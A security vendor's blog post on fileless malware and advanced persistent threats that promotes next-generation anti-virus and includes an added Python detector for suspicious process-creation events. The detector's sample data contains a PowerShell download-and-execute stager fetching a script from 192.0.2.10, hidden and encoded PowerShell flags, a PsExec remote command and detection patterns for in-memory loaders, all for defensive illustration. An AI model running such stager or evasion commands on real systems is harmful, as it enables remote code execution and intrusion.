While you are busy taking advantage of all the latest advances in IT which allow you greater ‘mobility’ where your work is concerned, someone else is rubbing their hands – the cyber-criminal.
The front line of the cyber war has moved away from the network perimeter and onto the endpoint. Every new device you use to reach your information, whether a PC, laptop, tablet, smartphone, virtual desktop or printer, is another entry point that widens the attack surface of your systems and network.
Yes, signature-based anti-virus still works against the nuisance malware that damages productivity and consumes IT time, because those samples are already known and have signatures. Against the advanced threats that can cripple a company, which are typically new, tailored to the target, or never written to disk at all, traditional anti-virus has very little to offer.
The simple truth is that traditional anti-virus software cannot keep pace with today's mobile workforce or with the cyber-criminal's constantly evolving tools of the trade. When the only barrier between the two is ineffective, the result is costly at best and catastrophic at worst.
What Are Cyber-criminals Up To?
So what is the cyber-criminal up to, and how do they target systems that you may not consider vulnerable, but they do? The answers show where traditional anti-virus falls short, why it is no longer adequate on its own, and why Next Generation Anti-Virus (NGAV) has emerged.
Consider the fileless infection (fileless malware), one of the hardest threats to detect because the malicious code is never written to disk as a file. It runs only in memory and is usually delivered through a malicious website or an email attachment that abuses a legitimate program already on the machine, so file-scanning anti-virus and signature-based intrusion detection have nothing to match against.
Fileless malware typically does one of two things: it harvests data directly, or it stages a more capable, equally stealthy second-stage implant. The code is injected into a legitimate running process, such as your browser, a Java runtime or PowerShell, and executes under that process's name. Because it lives only in RAM it disappears on reboot, which removes the disk evidence an investigator would normally rely on after the fact, but by then the data is already gone. One caveat every defender should know: many real-world variants add a small persistence hook, such as a registry run key or a WMI event subscription that re-launches the in-memory stage, so a reboot alone must never be treated as a cleanup.
Advanced Persistent Threats
Then there are Advanced Persistent Threats (APTs), which rely on powerful scripting tools, PowerShell above all, together with legitimate administrative applications such as PsExec and TeamViewer. Because these tools are already present and already trusted on the network, the attacker's activity blends in with routine administration, a tactic often described as living off the land.
The cyber-criminal has moved on from the 'Four Amigos', Stuxnet, Flame, Gauss and Duqu, and now favors APT campaigns that are not only difficult to stop but insidious in nature, with the ability to lie dormant within a system for long periods. As APTs are operated remotely, it is often only through close analysis of outbound traffic, the command-and-control beacons and the data exfiltration, that anomalies are detected and suspicions raised, which puts greater pressure on the need for full-time monitoring and oversight.
APTs are designed to access and 'steal' data which will have value in the marketplace. With remote access to your system established, the hacker can simply sell that access to an interested party, and not just one, either. And that's just for starters....
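The fileless and living-off-the-land behaviour described in the two sections above can be spotted at the process level if endpoint telemetry is collected. The following Python is an added example for this page, not code from the original post or from Info Exchange: it walks a handful of constructed Sysmon-style process-creation records and flags a document or browser process spawning a script host, PowerShell launched with hidden or encoded flags, a decoded command that pulls code straight into memory, and PsExec on either end of a remote execution. The field names, rule names, indicator lists, the 192.0.2.10 address and every sample record are assumptions made for the illustration.

```python
"""Flag fileless and living-off-the-land tradecraft in process-creation logs.

Added example for this page, not product code: the three fields mirror
Sysmon Event ID 1 (Image, ParentImage, CommandLine), but every record below
is constructed, and the rule names and indicator lists are assumptions.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the process that spawned it
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


# Document apps, browsers and the Java runtime: the usual hosts from which an
# email- or web-borne fileless stage is launched.
LURE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
                "java.exe", "javaw.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PsExec client, the PSEXESVC service it drops on the target, and TeamViewer.
REMOTE_ADMIN_TOOLS = {"psexec.exe", "psexec64.exe", "psexesvc.exe", "teamviewer.exe"}

# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
EVASION_FLAGS = re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile|noni|noninteractive|"
                           r"w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)(?=\s|$)")
# Primitives that download, decode or map code straight into memory.
IN_MEMORY = re.compile(r"(?i)(?:\bIEX\b|Invoke-Expression|DownloadString|FromBase64String|"
                       r"Reflection\.Assembly|VirtualAlloc|Add-Type)")


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16
        return None


def analyze(ev: ProcessEvent) -> list:
    """Apply every rule to one event and return the findings in rule order."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    findings = []
    if parent in LURE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding("lure_spawned_script_host", f"{parent} -> {image}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        if EVASION_FLAGS.search(ev.command_line):
            findings.append(Finding("powershell_evasion_flags", ev.command_line))
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append(Finding("encoded_powershell", decoded))
        # Inspect the decoded script together with the raw command line.
        if IN_MEMORY.search((decoded or "") + " " + ev.command_line):
            findings.append(Finding("in_memory_payload", decoded or ev.command_line))
    if image in REMOTE_ADMIN_TOOLS:
        findings.append(Finding("remote_admin_tool", f"{image} (parent {parent})"))
    return findings


def scan(events) -> list:
    """Return (event, findings) pairs for every event that triggered a rule."""
    hits = []
    for ev in events:
        findings = analyze(ev)
        if findings:
            hits.append((ev, findings))
    return hits


# Constructed events (not real telemetry). The encoded blob is generated here
# from a readable stager; a real log carries only the base64.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"
_BLOB = base64.b64encode(_STAGER.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),            # benign
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 f"powershell.exe -nop -w hidden -enc {_BLOB}"),           # fileless stage
    ProcessEvent(r"C:\Windows\PSEXESVC.exe", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\PSEXESVC.exe"),                              # PsExec target side
    ProcessEvent(r"C:\Tools\PsExec.exe", r"C:\Windows\System32\cmd.exe",
                 r"PsExec.exe \\FILESRV01 -s -d cmd.exe /c whoami"),       # PsExec client side
]

if __name__ == "__main__":
    for ev, findings in scan(SAMPLE_EVENTS):
        print(basename(ev.image), [f.rule for f in findings])
```

The benign backup script from Explorer produces nothing; the Word-spawned PowerShell trips all four of the relevant rules, and the decoded `-enc` payload is what exposes the download-and-execute stager that never touches disk. In a real deployment the same rules would run over the endpoint agent's telemetry stream rather than a fixed list, and the indicator sets would be tuned against the organisation's own administrative habits to keep PsExec and TeamViewer findings at review severity rather than alert severity.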
Next Generation Anti-Virus
In comes Next Generation Anti-Virus (NGAV), an endpoint-centric platform that has performed well in detecting APT activity. Rather than matching files against signatures, NGAV examines every process in memory on every endpoint and uses behavioural models to detect and block the malicious tools, tactics, techniques and procedures on which attackers rely, so even fileless malware is caught. Built on data science, machine learning and threat intelligence, NGAV provides context and insight into even previously unknown patterns of attack. Impressive!
So, maybe it's time to talk to us here at Info Exchange. Our initial consultation will help to highlight possible vulnerabilities, and we will work closely with your team to come up with a tailor-made plan of action integrated with an NGAV. Call us, or send us an email, and take the first step to ensuring you have the optimum cyber-security system in place.